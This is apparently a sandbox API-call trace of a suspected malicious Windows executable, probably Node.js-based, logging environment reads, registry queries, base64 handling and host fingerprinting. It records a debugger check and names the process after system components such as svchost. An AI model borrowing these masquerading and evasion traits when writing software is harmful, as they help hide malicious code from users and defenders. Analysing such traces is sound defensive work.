	[0101.207] SetLastError (dwErrCode=0x0) 
	[0101.207] GetLastError () returned 0x0
	[0101.207] SetLastError (dwErrCode=0x0) 
	[0101.207] GetLastError () returned 0x0
	[0101.207] SetLastError (dwErrCode=0x0) 
	[0101.207] GetLastError () returned 0x0
	[0101.207] SetLastError (dwErrCode=0x0) 
	[0101.208] GetLastError () returned 0x0
	[0101.208] SetLastError (dwErrCode=0x0) 
	[0101.208] GetLastError () returned 0x0
	[0101.208] SetLastError (dwErrCode=0x0) 
	[0101.208] GetLastError () returned 0x0
	[0101.208] SetLastError (dwErrCode=0x0) 
	[0101.208] GetLastError () returned 0x0
	[0101.208] SetLastError (dwErrCode=0x0) 
	[0101.208] GetLastError () returned 0x0
	[0101.208] SetLastError (dwErrCode=0x0) 
	[0101.208] GetLastError () returned 0x0
	[0101.208] SetLastError (dwErrCode=0x0) 
	[0101.208] GetLastError () returned 0x0
	[0101.209] SetLastError (dwErrCode=0x0) 
	[0101.209] GetLastError () returned 0x0
	[0101.209] SetLastError (dwErrCode=0x0) 
	[0101.209] GetLastError () returned 0x0
	[0101.209] SetLastError (dwErrCode=0x0) 
	[0101.209] GetLastError () returned 0x0
	[0101.209] SetLastError (dwErrCode=0x0) 
	[0101.209] GetLastError () returned 0x0
	[0101.209] SetLastError (dwErrCode=0x0) 
	[0101.209] GetLastError () returned 0x0
	[0101.209] SetLastError (dwErrCode=0x0) 
	[0101.209] GetLastError () returned 0x0
	[0101.209] SetLastError (dwErrCode=0x0) 
	[0101.209] GetLastError () returned 0x0
	[0101.209] SetLastError (dwErrCode=0x0) 
	[0101.210] GetLastError () returned 0x0
	[0101.210] SetLastError (dwErrCode=0x0) 
	[0101.210] GetLastError () returned 0x0
	[0101.210] SetLastError (dwErrCode=0x0) 
	[0101.210] GetLastError () returned 0x0
	[0101.210] SetLastError (dwErrCode=0x0) 
	[0101.210] GetLastError () returned 0x0
	[0101.210] SetLastError (dwErrCode=0x0) 
	[0101.210] GetLastError () returned 0x0
	[0101.210] SetLastError (dwErrCode=0x0) 
	[0101.210] GetLastError () returned 0x0
	[0101.210] SetLastError (dwErrCode=0x0) 
	[0101.210] GetLastError () returned 0x0
	[0101.210] SetLastError (dwErrCode=0x0) 
	[0101.210] GetLastError () returned 0x0
	[0101.211] SetLastError (dwErrCode=0x0) 
	[0101.211] GetLastError () returned 0x0
	[0101.211] SetLastError (dwErrCode=0x0) 
	[0101.211] GetLastError () returned 0x0
	[0101.211] SetLastError (dwErrCode=0x0) 
	[0101.211] GetLastError () returned 0x0
	[0101.211] SetLastError (dwErrCode=0x0) 
	[0101.211] GetLastError () returned 0x0
	[0101.211] SetLastError (dwErrCode=0x0) 
	[0101.211] GetLastError () returned 0x0
	[0101.211] SetLastError (dwErrCode=0x0) 
	[0101.211] GetLastError () returned 0x0
	[0101.211] SetLastError (dwErrCode=0x0) 
	[0101.211] GetLastError () returned 0x0
	[0101.212] SetLastError (dwErrCode=0x0) 
	[0101.212] GetLastError () returned 0x0
	[0101.212] SetLastError (dwErrCode=0x0) 
	[0101.212] GetLastError () returned 0x0
	[0101.212] SetLastError (dwErrCode=0x0) 
	[0101.212] GetLastError () returned 0x0
	[0101.212] SetLastError (dwErrCode=0x0) 
	[0101.212] GetLastError () returned 0x0
	[0101.212] SetLastError (dwErrCode=0x0) 
	[0101.212] GetLastError () returned 0x0
	[0101.212] SetLastError (dwErrCode=0x0) 
	[0101.212] GetLastError () returned 0x0
	[0101.212] SetLastError (dwErrCode=0x0) 
	[0101.213] GetLastError () returned 0x0
	[0101.213] SetLastError (dwErrCode=0x0) 
	[0101.213] GetLastError () returned 0x0
	[0101.213] SetLastError (dwErrCode=0x0) 
	[0101.213] GetLastError () returned 0x0
	[0101.213] SetLastError (dwErrCode=0x0) 
	[0101.213] GetLastError () returned 0x0
	[0101.213] SetLastError (dwErrCode=0x0) 
	[0101.213] GetLastError () returned 0x0
	[0101.214] SetLastError (dwErrCode=0x0) 
	[0101.214] GetLastError () returned 0x0
	[0101.214] SetLastError (dwErrCode=0x0) 
	[0101.214] GetLastError () returned 0x0
	[0101.214] SetLastError (dwErrCode=0x0) 
	[0101.214] GetLastError () returned 0x0
	[0101.214] SetLastError (dwErrCode=0x0) 
	[0101.214] GetLastError () returned 0x0
	[0101.214] SetLastError (dwErrCode=0x0) 
	[0101.214] GetLastError () returned 0x0
	[0101.214] SetLastError (dwErrCode=0x0) 
	[0101.214] GetLastError () returned 0x0
	[0101.215] SetLastError (dwErrCode=0x0) 
	[0101.215] GetLastError () returned 0x0
	[0101.215] SetLastError (dwErrCode=0x0) 
	[0101.215] SetLastError (dwErrCode=0x0) 
	[0101.215] GetLastError () returned 0x0
	[0101.215] SetLastError (dwErrCode=0x0) 
	[0101.215] GetLastError () returned 0x0
	[0101.215] SetLastError (dwErrCode=0x0) 
	[0101.224] SetLastError (dwErrCode=0x0) 
	[0101.224] GetLastError () returned 0x0
	[0101.224] SetLastError (dwErrCode=0x0) 
	[0101.224] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20aeaa8 | out: lpPreviousCount=0x20aeaa8) returned 1
	[0101.227] GetEnvironmentVariableW (in: lpName="NODE_DEBUG", lpBuffer=0x209f4ec, nSize=0x7fff | out: lpBuffer="\x9005\x2743\x1d9d\x414\xffff\xffff\x0c") returned 0x0
	[0101.227] GetLastError () returned 0xcb
	[0101.230] _strcmpi (_Str1="utf8", _Str2="utf8") returned 0
	[0101.231] _strcmpi (_Str1="utf8", _Str2="utf8") returned 0
	[0101.231] _strcmpi (_Str1="utf8", _Str2="utf8") returned 0
	[0101.231] _strcmpi (_Str1="utf8", _Str2="utf8") returned 0
	[0101.231] _strcmpi (_Str1="base64", _Str2="utf8") returned -1
	[0101.231] _strcmpi (_Str1="base64", _Str2="utf-8") returned -1
	[0101.231] _strcmpi (_Str1="base64", _Str2="ascii") returned 1
	[0101.231] _strcmpi (_Str1="base64", _Str2="base64") returned 0
	[0101.232] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af1e8 | out: lpPreviousCount=0x20af1e8) returned 1
	[0101.233] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af458 | out: lpPreviousCount=0x20af458) returned 1
	[0101.240] SetLastError (dwErrCode=0x0) 
	[0101.240] GetLastError () returned 0x0
	[0101.240] SetLastError (dwErrCode=0x0) 
	[0101.240] GetVersion () returned 0x23f00206
	[0101.241] SetLastError (dwErrCode=0x0) 
	[0101.241] GetLastError () returned 0x0
	[0101.241] SetLastError (dwErrCode=0x0) 
	[0101.242] SetLastError (dwErrCode=0x0) 
	[0101.242] GetLastError () returned 0x0
	[0101.242] SetLastError (dwErrCode=0x0) 
	[0101.244] SetLastError (dwErrCode=0x0) 
	[0101.297] GetLastError () returned 0x0
	[0101.297] SetLastError (dwErrCode=0x0) 
	[0101.301] _strcmpi (_Str1="base64", _Str2="utf8") returned -1
	[0101.301] _strcmpi (_Str1="base64", _Str2="utf-8") returned -1
	[0101.301] _strcmpi (_Str1="base64", _Str2="ascii") returned 1
	[0101.301] _strcmpi (_Str1="base64", _Str2="base64") returned 0
	[0101.302] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af6b0 | out: lpPreviousCount=0x20af6b0) returned 1
	[0101.303] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af6e0 | out: lpPreviousCount=0x20af6e0) returned 1
	[0101.306] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af5c0 | out: lpPreviousCount=0x20af5c0) returned 1
	[0101.309] timeGetTime () returned 0x2cdf0
	[0101.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af41c | out: lpSystemTimeAsFileTime=0x20af41c*(dwLowDateTime=0x6df7f67c, dwHighDateTime=0x1d492ec)) 
	[0101.309] timeGetTime () returned 0x2cdf1
	[0101.309] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af40c | out: lpSystemTimeAsFileTime=0x20af40c*(dwLowDateTime=0x6df800d0, dwHighDateTime=0x1d492ec)) 
	[0101.310] VirtualAlloc (lpAddress=0x1d404000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d404000
	[0101.310] VirtualAlloc (lpAddress=0x1d408000, dwSize=0x8000, flAllocationType=0x1000, flProtect=0x4) returned 0x1d408000
	[0101.324] timeGetTime () returned 0x2ce00
	[0101.324] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af41c | out: lpSystemTimeAsFileTime=0x20af41c*(dwLowDateTime=0x6dfa4b53, dwHighDateTime=0x1d492ec)) 
	[0101.325] timeGetTime () returned 0x2ce00
	[0101.325] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af40c | out: lpSystemTimeAsFileTime=0x20af40c*(dwLowDateTime=0x6dfa5de0, dwHighDateTime=0x1d492ec)) 
	[0101.325] timeGetTime () returned 0x2ce00
	[0101.325] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af41c | out: lpSystemTimeAsFileTime=0x20af41c*(dwLowDateTime=0x6dfa71e1, dwHighDateTime=0x1d492ec)) 
	[0101.325] timeGetTime () returned 0x2ce01
	[0101.325] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af40c | out: lpSystemTimeAsFileTime=0x20af40c*(dwLowDateTime=0x6dfa71e1, dwHighDateTime=0x1d492ec)) 
	[0101.326] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af470 | out: lpPreviousCount=0x20af470) returned 1
	[0101.340] SetLastError (dwErrCode=0x0) 
	[0101.340] GetLastError () returned 0x0
	[0101.340] SetLastError (dwErrCode=0x0) 
	[0101.341] SetLastError (dwErrCode=0x0) 
	[0101.341] GetLastError () returned 0x0
	[0101.341] SetLastError (dwErrCode=0x0) 
	[0101.375] SetLastError (dwErrCode=0x0) 
	[0101.375] GetLastError () returned 0x0
	[0101.375] SetLastError (dwErrCode=0x0) 
	[0101.375] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x209f724, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Roaming") returned 0x21
	[0101.376] _strcmpi (_Str1="base64", _Str2="utf8") returned -1
	[0101.376] _strcmpi (_Str1="base64", _Str2="utf-8") returned -1
	[0101.376] _strcmpi (_Str1="base64", _Str2="ascii") returned 1
	[0101.376] _strcmpi (_Str1="base64", _Str2="base64") returned 0
	[0101.378] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af5c0 | out: lpPreviousCount=0x20af5c0) returned 1
	[0101.382] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af5c0 | out: lpPreviousCount=0x20af5c0) returned 1
	[0101.383] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x209f478, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi") returned 0x11
	[0101.383] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x209f4c0, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi") returned 0x11
	[0101.383] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x209f4c0, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi") returned 0x11
	[0101.384] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x209f4c0, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi") returned 0x11
	[0101.384] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x209f4c0, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi") returned 0x11
	[0101.384] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x209f4c0, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi") returned 0x11
	[0101.384] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x209f4c0, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi") returned 0x11
	[0101.384] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x209f4c0, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi") returned 0x11
	[0101.385] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x209f4c0, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi") returned 0x11
	[0101.385] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x209f4c0, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi") returned 0x11
	[0101.385] GetEnvironmentVariableW (in: lpName="APPDATA", lpBuffer=0x209f4c0, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Roaming") returned 0x21
	[0101.387] GetEnvironmentVariableW (in: lpName="NODE_MODULE_CONTEXTS", lpBuffer=0x209f75c, nSize=0x7fff | out: lpBuffer="aming") returned 0x0
	[0101.387] GetLastError () returned 0xcb
	[0101.387] SetLastError (dwErrCode=0xcb) 
	[0101.387] GetLastError () returned 0xcb
	[0101.387] SetLastError (dwErrCode=0xcb) 
	[0101.387] GetLastError () returned 0xcb
	[0101.388] SetLastError (dwErrCode=0xcb) 
	[0101.388] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x209f73c, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi") returned 0x11
	[0101.388] GetEnvironmentVariableW (in: lpName="NODE_PATH", lpBuffer=0x209f73c, nSize=0x7fff | out: lpBuffer="C:\\Users\\Nd9E1FYi") returned 0x0
	[0101.388] GetLastError () returned 0xcb
	[0101.389] SetLastError (dwErrCode=0x0) 
	[0101.389] GetLastError () returned 0x0
	[0101.389] SetLastError (dwErrCode=0x0) 
	[0101.515] GetEnvironmentVariableW (in: lpName="vendor_id", lpBuffer=0x209f7f4, nSize=0x7fff | out: lpBuffer="exe_scheduler_3007") returned 0x12
	[0101.515] GetEnvironmentVariableW (in: lpName="mainprocessoverride", lpBuffer=0x209f7f4, nSize=0x7fff | out: lpBuffer="svchost.exe") returned 0xb
	[0101.515] GetEnvironmentVariableW (in: lpName="mainprocessoverride", lpBuffer=0x209f7f4, nSize=0x7fff | out: lpBuffer="svchost.exe") returned 0xb
	[0101.515] memchr (_Buf=0x2f77da6c, _Val=124, _MaxCount=0x5f) returned 0x2f77da7f
	[0101.515] memchr (_Buf=0x2f77da80, _Val=124, _MaxCount=0x4b) returned 0x2f77da93
	[0101.515] memchr (_Buf=0x2f77da94, _Val=124, _MaxCount=0x37) returned 0x2f77daaf
	[0101.515] memchr (_Buf=0x2f77dab0, _Val=124, _MaxCount=0x1b) returned 0x2f77dabe
	[0101.515] memchr (_Buf=0x2f77dabf, _Val=124, _MaxCount=0xc) returned 0x0
	[0101.564] SetLastError (dwErrCode=0x0) 
	[0101.565] GetLastError () returned 0x0
	[0101.565] SetLastError (dwErrCode=0x0) 
	[0101.571] SetLastError (dwErrCode=0x0) 
	[0101.571] GetLastError () returned 0x0
	[0101.571] SetLastError (dwErrCode=0x0) 
	[0101.572] _strcmpi (_Str1="base64", _Str2="utf8") returned -1
	[0101.572] _strcmpi (_Str1="base64", _Str2="utf-8") returned -1
	[0101.572] _strcmpi (_Str1="base64", _Str2="ascii") returned 1
	[0101.572] _strcmpi (_Str1="base64", _Str2="base64") returned 0
	[0101.578] SetLastError (dwErrCode=0x0) 
	[0101.578] GetLastError () returned 0x0
	[0101.578] SetLastError (dwErrCode=0x0) 
	[0101.578] _strcmpi (_Str1="base64", _Str2="utf8") returned -1
	[0101.578] _strcmpi (_Str1="base64", _Str2="utf-8") returned -1
	[0101.578] _strcmpi (_Str1="base64", _Str2="ascii") returned 1
	[0101.578] _strcmpi (_Str1="base64", _Str2="base64") returned 0
	[0101.579] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af718 | out: lpPreviousCount=0x20af718) returned 1
	[0101.580] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af710 | out: lpPreviousCount=0x20af710) returned 1
	[0101.580] SetLastError (dwErrCode=0x0) 
	[0101.580] GetLastError () returned 0x0
	[0101.581] SetLastError (dwErrCode=0x0) 
	[0101.581] GetLastError () returned 0x0
	[0101.581] SetLastError (dwErrCode=0x0) 
	[0101.584] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af658 | out: lpPreviousCount=0x20af658) returned 1
	[0101.587] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af4d8 | out: lpPreviousCount=0x20af4d8) returned 1
	[0101.590] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af568 | out: lpPreviousCount=0x20af568) returned 1
	[0101.599] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af620 | out: lpPreviousCount=0x20af620) returned 1
	[0101.642] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af568 | out: lpPreviousCount=0x20af568) returned 1
	[0101.644] SetLastError (dwErrCode=0x0) 
	[0101.644] GetLastError () returned 0x0
	[0101.644] SetLastError (dwErrCode=0x0) 
	[0101.644] GetLastError () returned 0x0
	[0101.644] SetLastError (dwErrCode=0x0) 
	[0101.646] timeGetTime () returned 0x2cf41
	[0101.646] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af2b4 | out: lpSystemTimeAsFileTime=0x20af2b4*(dwLowDateTime=0x6e2b60c5, dwHighDateTime=0x1d492ec)) 
	[0101.646] timeGetTime () returned 0x2cf41
	[0101.646] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af2a4 | out: lpSystemTimeAsFileTime=0x20af2a4*(dwLowDateTime=0x6e2b60c5, dwHighDateTime=0x1d492ec)) 
	[0101.646] VirtualAlloc (lpAddress=0x38200000, dwSize=0x200000, flAllocationType=0x1000, flProtect=0x4) returned 0x38200000
	[0101.650] VirtualAlloc (lpAddress=0x38a00000, dwSize=0x200000, flAllocationType=0x1000, flProtect=0x4) returned 0x38a00000
	[0101.663] timeGetTime () returned 0x2cf53
	[0101.663] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af2b4 | out: lpSystemTimeAsFileTime=0x20af2b4*(dwLowDateTime=0x6e2e0c09, dwHighDateTime=0x1d492ec)) 
	[0101.663] timeGetTime () returned 0x2cf53
	[0101.664] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af2a4 | out: lpSystemTimeAsFileTime=0x20af2a4*(dwLowDateTime=0x6e2e1fea, dwHighDateTime=0x1d492ec)) 
	[0101.664] timeGetTime () returned 0x2cf53
	[0101.664] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af2b4 | out: lpSystemTimeAsFileTime=0x20af2b4*(dwLowDateTime=0x6e2e1fea, dwHighDateTime=0x1d492ec)) 
	[0101.664] timeGetTime () returned 0x2cf53
	[0101.664] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20af2a4 | out: lpSystemTimeAsFileTime=0x20af2a4*(dwLowDateTime=0x6e2e1fea, dwHighDateTime=0x1d492ec)) 
	[0101.665] GetVersionExW (in: lpVersionInformation=0x20af78c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x7, dwMinorVersion=0x0, dwBuildNumber=0x20af800, dwPlatformId=0x20af800, szCSDVersion="\xf7b8\x20a") | out: lpVersionInformation=0x20af78c*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0101.665] wsprintfA (in: param_1=0x20af68c, param_2="%d.%d.%d" | out: param_1="6.2.9200") returned 8
	[0101.665] memchr (_Buf=0x388a62f4, _Val=46, _MaxCount=0x8) returned 0x388a62f5
	[0101.665] memchr (_Buf=0x388a62f6, _Val=46, _MaxCount=0x6) returned 0x388a62f7
	[0101.665] memchr (_Buf=0x388a62f8, _Val=46, _MaxCount=0x4) returned 0x0
	[0101.665] RegOpenCurrentUser (in: samDesired=0xf003f, phkResult=0x26d4bf0 | out: phkResult=0x26d4bf0*=0x7d4) returned 0x0
	[0101.665] RegCreateKeyExW (in: hKey=0x7d4, lpSubKey="SOFTWARE\\Microsoft", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x26d4bec, lpdwDisposition=0x0 | out: phkResult=0x26d4bec*=0x7d8, lpdwDisposition=0x0) returned 0x0
	[0101.666] RegQueryValueExW (in: hKey=0x7d8, lpValueName="{7ade5bfc-66f6-4220-aa24-6032bdb90317}", lpReserved=0x0, lpType=0x20af868, lpData=0x0, lpcbData=0x0 | out: lpType=0x20af868*=0x0, lpData=0x0, lpcbData=0x0) returned 0x2
	[0101.666] _strcmpi (_Str1="base64", _Str2="utf8") returned -1
	[0101.666] _strcmpi (_Str1="base64", _Str2="utf-8") returned -1
	[0101.666] _strcmpi (_Str1="base64", _Str2="ascii") returned 1
	[0101.666] _strcmpi (_Str1="base64", _Str2="base64") returned 0
	[0101.669] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af5d8 | out: lpPreviousCount=0x20af5d8) returned 1
	[0101.670] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af608 | out: lpPreviousCount=0x20af608) returned 1
	[0101.672] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af5d8 | out: lpPreviousCount=0x20af5d8) returned 1
	[0101.672] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af5e0 | out: lpPreviousCount=0x20af5e0) returned 1
	[0101.673] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af630 | out: lpPreviousCount=0x20af630) returned 1
	[0101.735] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af630 | out: lpPreviousCount=0x20af630) returned 1
	[0101.737] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af5e0 | out: lpPreviousCount=0x20af5e0) returned 1
	[0101.741] RegOpenCurrentUser (in: samDesired=0xf003f, phkResult=0x26d4cf0 | out: phkResult=0x26d4cf0*=0x7dc) returned 0x0
	[0101.741] RegCreateKeyExW (in: hKey=0x7dc, lpSubKey="SOFTWARE\\Microsoft", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x26d4cec, lpdwDisposition=0x0 | out: phkResult=0x26d4cec*=0x7e0, lpdwDisposition=0x0) returned 0x0
	[0101.741] RegQueryValueExW (in: hKey=0x7e0, lpValueName="{102f49a9-80c9-42ee-8924-3256738fc621}", lpReserved=0x0, lpType=0x20af868, lpData=0x0, lpcbData=0x0 | out: lpType=0x20af868*=0x0, lpData=0x0, lpcbData=0x0) returned 0x2
	[0101.750] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20af0b8 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Desktop") returned 0x19
	[0101.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Nd9E1FYi\\Desktop", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 26
	[0101.750] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\Nd9E1FYi\\Desktop", cchWideChar=-1, lpMultiByteStr=0x20af2dc, cbMultiByte=1040, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\Nd9E1FYi\\Desktop", lpUsedDefaultChar=0x0) returned 26
	[0101.751] _strcmpi (_Str1="base64", _Str2="utf8") returned -1
	[0101.751] _strcmpi (_Str1="base64", _Str2="utf-8") returned -1
	[0101.751] _strcmpi (_Str1="base64", _Str2="ascii") returned 1
	[0101.751] _strcmpi (_Str1="base64", _Str2="base64") returned 0
	[0101.753] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af698 | out: lpPreviousCount=0x20af698) returned 1
	[0101.754] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af680 | out: lpPreviousCount=0x20af680) returned 1
	[0101.755] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af6d0 | out: lpPreviousCount=0x20af6d0) returned 1
	[0101.756] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af670 | out: lpPreviousCount=0x20af670) returned 1
	[0101.756] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af670 | out: lpPreviousCount=0x20af670) returned 1
	[0101.757] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af670 | out: lpPreviousCount=0x20af670) returned 1
	[0101.759] OutputDebugStringA (lpOutputString="JS : RUN : smsvchost32.exe, ver : 25.10.18.1117\n") 
	[0101.759] GetEnvironmentVariableW (in: lpName="dump_debug_to_file", lpBuffer=0x209f83c, nSize=0x7fff | out: lpBuffer="@") returned 0x0
	[0101.759] GetLastError () returned 0xcb
	[0101.760] ReleaseSemaphore (in: hSemaphore=0x408, lReleaseCount=1, lpPreviousCount=0x20af910 | out: lpPreviousCount=0x20af910) returned 1
	[0101.760] GetNativeSystemInfo (in: lpSystemInfo=0x20af910 | out: lpSystemInfo=0x20af910*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0101.761] gethostname (in: name=0x20af83c, namelen=257 | out: name="x2vS1cum") returned 0
	[0101.761] GetSystemInfo (in: lpSystemInfo=0x20af5a4 | out: lpSystemInfo=0x20af5a4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0101.762] GetModuleHandleExW (in: dwFlags=0x6, lpModuleName=0x401f160, phModule=0x20aea38 | out: phModule=0x20aea38*=0x77960000) returned 1
	[0101.762] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77960000
	[0101.762] GetModuleFileNameW (in: hModule=0x77960000, lpFilename=0x20aeec4, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d
	[0101.762] IsDebuggerPresent () returned 0
	[0101.762] GetProcessWindowStation () returned 0x84
	[0101.762] GetUserObjectInformationW (in: hObj=0x84, nIndex=1, pvInfo=0x20aea04, nLength=0xc, lpnLengthNeeded=0x20ae9f0 | out: pvInfo=0x20aea04, lpnLengthNeeded=0x20ae9f0) returned 1
	[0101.762] GetActiveWindow () returned 0x0
	[0101.762] MessageBoxW (hWnd=0x0, lpText="Assertion failed!\n\nProgram: C:\\Windows\\SYSTEM32\\ntdll.dll\nFile: src\\win\\util.c\nLine: 655\n\nExpression: result_size == sppi_size\n\nFor information on how your program can cause an assertion\nfailure, see the Visual C++ documentation on asserts\n\n(Press Retry to debug the application - JIT must be enabled)", lpCaption="Microsoft Visual C++ Runtime Library", uType=0x12012) returned 5
	[0102.032] GetLastError () returned 0x0
	[0102.032] SetLastError (dwErrCode=0x0) 
	[0102.032] GetLastError () returned 0x0
	[0102.032] SetLastError (dwErrCode=0x0) 
	[0102.036] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", ulOptions=0x0, samDesired=0x1, phkResult=0x20af580 | out: phkResult=0x20af580*=0x7e8) returned 0x0
	[0102.036] RegQueryValueExW (in: hKey=0x7e8, lpValueName="~MHz", lpReserved=0x0, lpType=0x0, lpData=0x20af5a0, lpcbData=0x20af598*=0x4 | out: lpType=0x0, lpData=0x20af5a0*=0xac, lpcbData=0x20af598*=0x4) returned 0x0
	[0102.036] RegQueryValueExW (in: hKey=0x7e8, lpValueName="ProcessorNameString", lpReserved=0x0, lpType=0x0, lpData=0x20af6c8, lpcbData=0x20af588*=0x200 | out: lpType=0x0, lpData=0x20af6c8*=0x49, lpcbData=0x20af588*=0x52) returned 0x0
	[0102.036] RegCloseKey (hKey=0x7e8) returned 0x0
	[0102.036] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Intel (R) Core(TM) i5-7500 CPU @ 3.40GHz", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41
